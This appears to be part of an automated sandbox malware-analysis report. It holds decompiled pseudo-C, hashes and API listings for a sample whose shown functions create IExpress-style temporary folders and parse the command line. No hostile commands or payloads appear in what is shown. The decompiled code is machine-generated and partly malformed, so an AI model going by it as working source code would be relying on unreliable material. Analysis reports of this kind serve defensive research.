                                                                                                                                                                                                                                            • Opcode ID: d0d37ae17d366bcd7b35f59c491ea1245e9ff04864f44483e9a216450ed3d9ca
                                                                                                                                                                                                                                            • Instruction ID: a8febf2f5709e3f9c0e8a330b2bdf3bd453087c2500338c011d24689b58f7139
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0d37ae17d366bcd7b35f59c491ea1245e9ff04864f44483e9a216450ed3d9ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3118F35A02328FB9B309B969C09DFFBEBCEF057A1F504095F989A2004D6314A44D6A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E010D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E010D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E010D1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E010D658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E010D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0x10d8a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x010d53ac
                                                                                                                                                                                                                                            0x010d53b3
                                                                                                                                                                                                                                            0x010d53b9
                                                                                                                                                                                                                                            0x010d53bb
                                                                                                                                                                                                                                            0x010d53bd
                                                                                                                                                                                                                                            0x010d53bf
                                                                                                                                                                                                                                            0x010d53d1
                                                                                                                                                                                                                                            0x010d53d6
                                                                                                                                                                                                                                            0x010d53e0
                                                                                                                                                                                                                                            0x010d53e2
                                                                                                                                                                                                                                            0x010d53f5
                                                                                                                                                                                                                                            0x010d53fb
                                                                                                                                                                                                                                            0x010d5402
                                                                                                                                                                                                                                            0x010d540b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5413
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5415
                                                                                                                                                                                                                                            0x010d5416
                                                                                                                                                                                                                                            0x010d5427
                                                                                                                                                                                                                                            0x010d542a
                                                                                                                                                                                                                                            0x010d542b
                                                                                                                                                                                                                                            0x010d5434
                                                                                                                                                                                                                                            0x010d5434
                                                                                                                                                                                                                                            0x010d543a
                                                                                                                                                                                                                                            0x010d544c
                                                                                                                                                                                                                                            0x010d544c
                                                                                                                                                                                                                                            0x010d5452
                                                                                                                                                                                                                                            0x010d545a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d545e
                                                                                                                                                                                                                                            0x010d545f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,010D91E4,?,00000001,010D91E4,00000000), ref: 010D53FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,010D91E4,00000000), ref: 010D5402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(010D91E4,IXP,00000000,?,?,00000001,010D91E4,00000000), ref: 010D541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,010D91E4,00000000), ref: 010D542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,010D91E4,00000000), ref: 010D5434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,010D91E4,00000000), ref: 010D5452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-3932986939
                                                                                                                                                                                                                                            • Opcode ID: 15de62571f178e930967134ee440504b8342e6e9f237b787bfe601f1a4bd246b
                                                                                                                                                                                                                                            • Instruction ID: 651acfcacb5666bcb5b4e0deba754e89b407fa85b3b9c950dde2d3583f7e0bfb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15de62571f178e930967134ee440504b8342e6e9f237b787bfe601f1a4bd246b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58110171702304A7E320AB369C48FEF3A6DEFD5311F004069FAC6D3180CE7A894287A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 492 10d6a60-10d6a91 call 10d7155 call 10d7208 GetStartupInfoW 498 10d6a93-10d6aa2 492->498 499 10d6abc-10d6abe 498->499 500 10d6aa4-10d6aa6 498->500 503 10d6abf-10d6ac5 499->503 501 10d6aaf-10d6aba Sleep 500->501 502 10d6aa8-10d6aad 500->502 501->498 502->503 504 10d6ac7-10d6acf _amsg_exit 503->504 505 10d6ad1-10d6ad7 503->505 506 10d6b0b-10d6b11 504->506 507 10d6ad9-10d6ae9 call 10d6c3f 505->507 508 10d6b05 505->508 510 10d6b2e-10d6b30 506->510 511 10d6b13-10d6b24 _initterm 506->511 512 10d6aee-10d6af2 507->512 508->506 513 10d6b3b-10d6b42 510->513 514 10d6b32-10d6b39 510->514 511->510 512->506 517 10d6af4-10d6b00 512->517 515 10d6b44-10d6b51 call 10d7060 513->515 516 10d6b67-10d6b71 513->516 514->513 515->516 525 10d6b53-10d6b65 515->525 519 10d6b74-10d6b79 516->519 520 10d6c39-10d6c3e call 10d724d 517->520 522 10d6b7b-10d6b7d 519->522 523 10d6bc5-10d6bc8 519->523 528 10d6b7f-10d6b81 522->528 529 10d6b94-10d6b98 522->529 526 10d6bca-10d6bd3 523->526 527 10d6bd6-10d6be3 _ismbblead 523->527 525->516 526->527 531 10d6be9-10d6bed 527->531 532 10d6be5-10d6be6 527->532 528->523 533 10d6b83-10d6b85 528->533 534 10d6b9a-10d6b9e 529->534 535 10d6ba0-10d6ba2 529->535 531->519 538 10d6c1e-10d6c25 531->538 532->531 533->529 539 10d6b87-10d6b8a 533->539 536 10d6ba3-10d6bbc call 10d2bfb 534->536 535->536 536->538 545 10d6bbe-10d6bbf exit 536->545 541 10d6c27-10d6c2d _cexit 538->541 542 10d6c32 538->542 539->529 543 10d6b8c-10d6b92 539->543 541->542 542->520 543->533 545->523
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E010D7155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0x10d72b8);
                                                                                                                                                                                                                                            				E010D7208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0x10d88b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0x10d88b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0x10d81e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x10d88b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E010D6C3F(0x10d10b8, 0x10d10c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L010D6FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0x10d88b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0x10d10b4);
                                                                                                                                                                                                                                            							_push(0x10d10ac);
                                                                                                                                                                                                                                            							L010D7202();
                                                                                                                                                                                                                                            							 *0x10d88b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0x10d88ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0x10d88b4;
                                                                                                                                                                                                                                            						if( *0x10d88b4 != 0 && E010D7060(_t71, 0x10d88b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0x10d88b4; // 0x0
                                                                                                                                                                                                                                            							 *0x10da288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E010D2BFB(0x10d0000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0x10d81e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0x10d81f8;
                                                                                                                                                                                                                                            							if( *0x10d81f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0x10d81e4;
                                                                                                                                                                                                                                            							if( *0x10d81e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0x10d81e0; // 0x0
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E010D724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x010d6a60
                                                                                                                                                                                                                                            0x010d6a6a
                                                                                                                                                                                                                                            0x010d6a6c
                                                                                                                                                                                                                                            0x010d6a71
                                                                                                                                                                                                                                            0x010d6a78
                                                                                                                                                                                                                                            0x010d6a7f
                                                                                                                                                                                                                                            0x010d6a85
                                                                                                                                                                                                                                            0x010d6a8e
                                                                                                                                                                                                                                            0x010d6a91
                                                                                                                                                                                                                                            0x010d6a93
                                                                                                                                                                                                                                            0x010d6a9c
                                                                                                                                                                                                                                            0x010d6aa2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6aa6
                                                                                                                                                                                                                                            0x010d6ab4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6aa8
                                                                                                                                                                                                                                            0x010d6aaa
                                                                                                                                                                                                                                            0x010d6aab
                                                                                                                                                                                                                                            0x010d6aab
                                                                                                                                                                                                                                            0x010d6abf
                                                                                                                                                                                                                                            0x010d6abf
                                                                                                                                                                                                                                            0x010d6ac5
                                                                                                                                                                                                                                            0x010d6ad1
                                                                                                                                                                                                                                            0x010d6ad7
                                                                                                                                                                                                                                            0x010d6b05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6ad9
                                                                                                                                                                                                                                            0x010d6ad9
                                                                                                                                                                                                                                            0x010d6ae9
                                                                                                                                                                                                                                            0x010d6af0
                                                                                                                                                                                                                                            0x010d6af2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6af4
                                                                                                                                                                                                                                            0x010d6af4
                                                                                                                                                                                                                                            0x010d6afb
                                                                                                                                                                                                                                            0x010d6afb
                                                                                                                                                                                                                                            0x010d6af2
                                                                                                                                                                                                                                            0x010d6ac7
                                                                                                                                                                                                                                            0x010d6ac7
                                                                                                                                                                                                                                            0x010d6ac9
                                                                                                                                                                                                                                            0x010d6b0b
                                                                                                                                                                                                                                            0x010d6b0b
                                                                                                                                                                                                                                            0x010d6b11
                                                                                                                                                                                                                                            0x010d6b13
                                                                                                                                                                                                                                            0x010d6b18
                                                                                                                                                                                                                                            0x010d6b1d
                                                                                                                                                                                                                                            0x010d6b24
                                                                                                                                                                                                                                            0x010d6b24
                                                                                                                                                                                                                                            0x010d6b30
                                                                                                                                                                                                                                            0x010d6b39
                                                                                                                                                                                                                                            0x010d6b39
                                                                                                                                                                                                                                            0x010d6b3b
                                                                                                                                                                                                                                            0x010d6b42
                                                                                                                                                                                                                                            0x010d6b57
                                                                                                                                                                                                                                            0x010d6b5f
                                                                                                                                                                                                                                            0x010d6b65
                                                                                                                                                                                                                                            0x010d6b65
                                                                                                                                                                                                                                            0x010d6b67
                                                                                                                                                                                                                                            0x010d6b6c
                                                                                                                                                                                                                                            0x010d6b6e
                                                                                                                                                                                                                                            0x010d6b71
                                                                                                                                                                                                                                            0x010d6b74
                                                                                                                                                                                                                                            0x010d6b74
                                                                                                                                                                                                                                            0x010d6b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6b7d
                                                                                                                                                                                                                                            0x010d6b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6b83
                                                                                                                                                                                                                                            0x010d6b8c
                                                                                                                                                                                                                                            0x010d6b8d
                                                                                                                                                                                                                                            0x010d6b90
                                                                                                                                                                                                                                            0x010d6b90
                                                                                                                                                                                                                                            0x010d6b83
                                                                                                                                                                                                                                            0x010d6b81
                                                                                                                                                                                                                                            0x010d6b94
                                                                                                                                                                                                                                            0x010d6b98
                                                                                                                                                                                                                                            0x010d6ba2
                                                                                                                                                                                                                                            0x010d6b9a
                                                                                                                                                                                                                                            0x010d6b9a
                                                                                                                                                                                                                                            0x010d6b9a
                                                                                                                                                                                                                                            0x010d6ba3
                                                                                                                                                                                                                                            0x010d6bab
                                                                                                                                                                                                                                            0x010d6bb0
                                                                                                                                                                                                                                            0x010d6bb5
                                                                                                                                                                                                                                            0x010d6bbc
                                                                                                                                                                                                                                            0x010d6bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6bbf
                                                                                                                                                                                                                                            0x010d6c1e
                                                                                                                                                                                                                                            0x010d6c25
                                                                                                                                                                                                                                            0x010d6c27
                                                                                                                                                                                                                                            0x010d6c2d
                                                                                                                                                                                                                                            0x010d6c2d
                                                                                                                                                                                                                                            0x010d6c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6bc5
                                                                                                                                                                                                                                            0x010d6bc5
                                                                                                                                                                                                                                            0x010d6bc8
                                                                                                                                                                                                                                            0x010d6bcc
                                                                                                                                                                                                                                            0x010d6bce
                                                                                                                                                                                                                                            0x010d6bce
                                                                                                                                                                                                                                            0x010d6bd1
                                                                                                                                                                                                                                            0x010d6bd3
                                                                                                                                                                                                                                            0x010d6bd3
                                                                                                                                                                                                                                            0x010d6bd6
                                                                                                                                                                                                                                            0x010d6bda
                                                                                                                                                                                                                                            0x010d6be1
                                                                                                                                                                                                                                            0x010d6be3
                                                                                                                                                                                                                                            0x010d6be5
                                                                                                                                                                                                                                            0x010d6be5
                                                                                                                                                                                                                                            0x010d6be6
                                                                                                                                                                                                                                            0x010d6be6
                                                                                                                                                                                                                                            0x010d6be9
                                                                                                                                                                                                                                            0x010d6bea
                                                                                                                                                                                                                                            0x010d6bea
                                                                                                                                                                                                                                            0x010d6b74
                                                                                                                                                                                                                                            0x010d6c39
                                                                                                                                                                                                                                            0x010d6c3e
                                                                                                                                                                                                                                            0x010d6c3e
                                                                                                                                                                                                                                            0x010d6abe
                                                                                                                                                                                                                                            0x010d6abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010D7182
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetCurrentProcessId.KERNEL32 ref: 010D7191
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetCurrentThreadId.KERNEL32 ref: 010D719A
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetTickCount.KERNEL32 ref: 010D71A3
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: QueryPerformanceCounter.KERNEL32(?), ref: 010D71B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,010D72B8,00000058), ref: 010D6A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 010D6AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 010D6AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 010D6B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 010D6B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 010D6BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 010D6BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: af3141745e2081e7024e893b83eb536059e4bd4eceeb40521474327423d80978
                                                                                                                                                                                                                                            • Instruction ID: 94a7c3e117df251ae79181f822699ba4243ca818ce81eb36c296a51779a9a2d9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af3141745e2081e7024e893b83eb536059e4bd4eceeb40521474327423d80978
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A41EF35A45365DBEB729B6DE8057BE7BE4FB44720F14805BEDC197284CB7A4880CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 546 10d5467-10d5484 547 10d551c-10d5528 call 10d1680 546->547 548 10d548a-10d5490 call 10d53a1 546->548 552 10d552d-10d5539 call 10d58c8 547->552 551 10d5495-10d5497 548->551 554 10d549d-10d54c0 call 10d1781 551->554 555 10d5581-10d5583 551->555 560 10d554d-10d5552 552->560 561 10d553b-10d5545 CreateDirectoryA 552->561 563 10d550c-10d551a call 10d658a 554->563 564 10d54c2-10d54d8 GetSystemInfo 554->564 558 10d558d-10d559d call 10d6ce0 555->558 568 10d5585-10d558b 560->568 569 10d5554-10d5557 call 10d597d 560->569 566 10d5577-10d557c call 10d6285 561->566 567 10d5547 561->567 563->552 570 10d54fe 564->570 571 10d54da-10d54dd 564->571 566->555 567->560 568->558 577 10d555c-10d555e 569->577 578 10d5503-10d5507 call 10d658a 570->578 575 10d54df-10d54e2 571->575 576 10d54f7-10d54fc 571->576 581 10d54e4-10d54e7 575->581 582 10d54f0-10d54f5 575->582 576->578 577->568 583 10d5560-10d5566 577->583 578->563 581->563 585 10d54e9-10d54ee 581->585 582->578 583->555 586 10d5568-10d5575 RemoveDirectoryA 583->586 585->578 586->555
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E010D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0x10d91e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E010D1680(0x10d91e4, 0x104);
